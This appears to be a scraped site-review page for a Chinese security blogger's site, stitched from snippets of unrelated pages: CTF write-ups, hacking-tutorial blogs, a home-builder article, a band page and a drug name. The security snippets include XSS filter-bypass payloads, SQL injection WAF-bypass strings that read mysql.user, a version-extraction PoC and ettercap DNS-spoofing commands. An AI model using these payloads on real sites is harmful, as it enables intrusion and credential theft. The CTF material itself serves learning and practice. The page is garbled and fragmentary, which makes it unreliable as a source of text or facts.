
hackersb.cn
Striker's LOFTER - Founder of 安全盒子 (www.secbox.cn), web security/development engineer.
http://www.hackersb.cn/
TODAY'S RATING
>1,000,000
HIGHEST TRAFFIC ON
Sunday
LOAD TIME
2.4 seconds
PAGES IN
THIS WEBSITE
0
SSL
EXTERNAL LINKS
88
SITE IP
54.248.125.234
LOAD TIME
2.422 sec
SCORE
6.2
Striker's LOFTER | hackersb.cn Reviews
https://hackersb.cn
Striker's LOFTER - Founder of 安全盒子 (www.secbox.cn), web security/development engineer.
Mosuan's Blog
http://www.0aa.me/index.php/page/2
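Requirement: inject out the database version. http://123.xxx.xx.220/ctf4/xxxx web sql.php Find the parameter name yourself; parameter values 1-5 all return data. Reference: http://webcache.googleusercontent.com/search?q=cache:CzRcrsZhiusJ:blog.portswigger.net/2015/11/xss-in-hidden-input-fields.html&cd=1&hl=zh-CN&ct=clnk&gl=tw http://www.w3school.co. Reposted from http://www.cnblogs.com/martin1009/archive/2012/08/24/2653718.html The Where condition expression format is $map['field name'] = array('expression', 'operation condition'); where $map is an ordinary array variable that you can name as you need. The expression in the format above actually denotes the operator. Additional note: as in SQL, ThinkPHP. Reposted from http://py4.me/blog/? 王松 Striker 666, awesome, learned something.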
A challenge-writing experience: XSS in an input tag (automatic popup required) - Mosuan's Blog
http://www.0aa.me/index.php/archives/82
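Tips1: mind the order of the attributes 2016.11.18 17:44. Tips2: image 2016.11.18 17:55. J v & # ; formaction oninput onblur cookie document window data / / % alert confirm : , http ' src= . . / */. This regex can be bypassed with onerror and autofocus. As I remember it I had written those in, and I don't know why they were missing. Damn. @春天的春,晴天的晴 from the group bypassed it with onerror, my friend bypassed it with autofocus, and 郑凯 used onclick, which however cannot pop up automatically. It is also my fault for not spelling out the rules in detail, so over the weekend I added those two keywords to the regex. The regex above is matched first, then the string is checked: if its length is greater than 50, or it has more than 2 equals signs, or more than one single quote, it goes into the blacklist. http://zone.secevery.com/? I posted this in the community: http://zone.secevery.com/? PoC by 春天的春,晴天的晴: image' src onerror=prompt`1` c.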
Posts in the Notes category - Mosuan's Blog
http://www.0aa.me/index.php/category/biji
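Union select x,x: blocked. Tried the function form of union, union(select 1,2,3): blocked. Union(%20select 1,2,3,4): not blocked; note the space before select. Union(%20select%201,(select%20user%20from%20mysql.user),3,4) p神 said it does not count as a bypass without from; trying to inject with from was blocked. Union(%20select%201,(select%20user%20from(mysql.user) ,3,4) Tried turning from into a function call; it was blocked. Union(%20select%201,(select%20user%20from(%20mysql.user)%20limit%202,1),3,4) Note that the first character inside the from function is a space. SecIcode online encoding tool (closed beta) V1 - 赛克艾威. http://zone.secevery.com/code/index.html Try it online; message me privately at any time if you need a feature, are interested in helping maintain it, or find a bug. Tips2: image 2016.11.18 17:55. Http:/ zo...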
A challenge-writing experience: SQL injection (extracting the database version required) - Mosuan's Blog
http://www.0aa.me/index.php/archives/80
http://123.xxx.xx.220/ctf4/xxxx web sql.php. Function reg replace($reg, $strs){ preg match($reg, $strs, $result); if(count($result) = 1){ $aa = preg replace($reg,' ,$strs); return reg replace($reg, $aa); }else{ return $strs; } }. http://www.0aa.me/index.php/archives/38/ Anyone who has read this post of mine would probably think of substring; substring is filtered here, but substr can be used to the same effect. PoC by Undefined: ' (substr(version()from(21) )! Original work, licensed under Creative Commons Attribution 3.0. 王松 Striker 666, awesome, learned something.
About me - Mosuan's Blog
http://www.0aa.me/index.php/start-page.html
Member of 北斗安全 https://secboom.com. 王松 Striker 666, awesome, learned something.
Posts in the Python category - Mosuan's Blog
http://www.0aa.me/index.php/category/python
Coding:utf-8 -*- #code by Mosuan #2016.09.30 import urlparse import urllib import sys def GetUrl(url, payload): urllist = urlparse.urlparse(url) if urllist.query! Build the original URL without parameters url host = %s:/ %s%s? Db user = root. Db pass = root. Db database = mscan. Db port = 3306. Db host = 127.0.0.1. Change to the real directory. In fact, you can edit the site.cfg file in the downloaded mysql library and change the path to the real path on your machine. For example mysql config = /Applications/MAMP/Library/bin/mysql config Updated 2017.01.09, as shown in the figure below. Ruby -e $(curl -fsSL https://raw.github.com/mxcl/homebrew/go).
SecIcode online encoding tool V1 - Mosuan's Blog
http://www.0aa.me/index.php/archives/86
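SecIcode online encoding tool (closed beta) V1 - 赛克艾威. http://zone.secevery.com/code/index.html Try it online; message me privately at any time if you need a feature, are interested in helping maintain it, or find a bug. Original work, licensed under Creative Commons Attribution 3.0. January 9th, 2017 at 01:48 pm. 王松 Striker 666, awesome, learned something.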
Reverse engineering router firmware: SQL injection | xd_xd's blog
http://xdxd.love/2016/09/20/逆向路由器固件之SQL注入
Posted on Sep 20 2016. Rootfs git:(master) find . -name my cgi .cgi. Usr/bin/my cgi .cgi. Rootfs git:(master) file ./usr/bin/my cgi .cgi. Usr/bin/my cgi .cgi. Bit LSB executable, MIPS, MIPS-II version 1. SYSV), dynamically linked (uses shared libs), stripped. Searching for the string select level from user where user name locates the do login function. Or level = ( select.
TOTAL LINKS TO THIS WEBSITE
88
HackErS..AuthORity
Learn hacking, computer basics and sql injection tutorials Download Hacking tools and ebooks and much more. Subscribe For Free Updates! We'll not spam mate! Become Our Fan on Social Sites! Saturday, 10 January 2015. HOW TO CRACK WINRAR FILE PASSWORD. This post will help to extract any password protected RAR File. Actually a computer needs a program which performs extraction, Mostly they don’t have built-in program or already installed version. If you dont have the RAR password to access in. Run the progr...
Autobots Hackers
For those who like 'adrenaline'. Learn to break into computers! Tuesday, 20 May 2008. Video lesson on how to freeze your friend's MSN. This video lesson was made by 'Autobots'. I'm not a hacker, I just know a bit about computing. Program to steal credit from another cell phone. Super Bluetooth Hack lets you get data from other cell phones via Bluetooth without the other person knowing. Once connected to another phone via Bluetooth you can:. See the contact list. Já não...
Be Hacker safe - Keep protected from Hackers
Be Hacker safe - Keep protected from Hackers. Be hacker safe - keep protect your id from hackers. Protect Your Website Against Hacking. Ways To Protect Your Website Against Hacking. Today in the age of affiliate marketing, more and more people are creating their own sites to market products. The most common type of hacking is the Cross site scripting also called as XSS. The second most common hacking technique is the Google hacking. Today most search engines provide lot of tools to webmasters to track an...
Hacker Says - quote by Alan J. Perlis
Or Fork for Theming. Best programming and hacker quotes. Ever. Curated by fellow hackers Jarmo Pertman. In computing, the mean time to failure keeps getting shorter. Alan J. Perlis. People who deal with bits should expect to get bitten. In programming, as in everything else, to be in error is to be reborn. Alan J. Perlis. A common mistake that people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools. Alan J. Perlis. What you’ve described, The bo...
Striker's LOFTER
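Founder of 安全盒子 (www.secbox.cn), web security/development engineer. No need to say much about this one: I recommend buying linux; don't ask me why not win, it is because linux has more style. For the installation steps see here, it is written in great detail: http://lnmp.org/install.html. Team: 安全盒子 team www.secbox.cn. Sudo apt-get install ettercap. Sudo vim /etc/ettercap/etter.dns. Com A 192.168.1.1. Cn A 192.168.1.1. Site www.secbox.cn. Foreword: the injection point is one in jcms. After injecting and obtaining the password, wefgod, a core member of 安全核心, reversed the password (thanks to wefgod here), but logging in to the admin backend reported a wrong password and nothing worked. Eventually it turned out that the injection point could execute commands. I tinkered with it for a long time without result, so I brought in 草叔叔, and that led to what follows, a really brilliant process. Team: 安全盒子 team www.secbox.cn. Original article: http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html. 好久没有捅...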
No One Knows Nothing | HackerSB
Choosing a Home Builder – What to Know. July 8, 2015. With a custom builder, it is important to remember that you own the property that the builder is going to be building on. With a typical home builder, the builder owns the property that the home is going on. One of the happiest days of your life is the day you decide to have a home built for yourself. Instead, you are choosing a home that will be unique to you and your family. Some other things to keep in mind with a contractor include:. A custom buil...
hackersball.com - This website is for sale! - hackersball Resources and Information.
The Hackers Band - St. Augustine Florida based acoustic band
Click Here to check out The Hackers' My Space. Who we are now. Gregg Chirico : Bass guitar, Vocals; Walt Kulwicki : Lead guitar, Rythum guitar, Vocals; Dave Besley : Rythum guitar, Vocals; Kurt Johnston: Pedal Steel, Guitar, Keyboards, Vocals; Frankie Urzetta : Drums , Vocals; Chris McVey : Guitar, Vocals. You can find us regularly the last Monday of every month at Hurricane Patty's (6-9 pm), And the second Wednesday of every Month at the Casa Marina at Jax Beach (6:30- 10 pm). We’re a bunch of guys that...
ITBANK: completing competitiveness with solid technical skills!
Itraconazole for fungal infections